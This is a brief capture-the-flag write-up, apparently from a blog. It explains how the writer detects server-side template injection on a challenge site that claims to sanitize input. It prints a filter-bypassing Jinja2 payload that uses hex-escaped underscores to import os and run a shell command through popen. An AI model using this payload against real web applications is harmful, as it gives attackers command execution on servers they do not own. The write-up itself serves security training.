Description
I made a cool website where you can announce whatever you want! I read about input sanitization, so now I remove any kind of characters that could be a problem :)
This is going to be challenging, but we’ve got this because, based on the description…
Using this image, we can test the site to see which templates we are working on.
from ${7*7} didn’t work, {{7*7}} works → {{7*'7'}} works → jinja2 or twig
Based on this post, we have different payloads to be able to bypass this with Jinja2
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('whoami')|attr('read')()}}
we’re in!!
Thanks for reading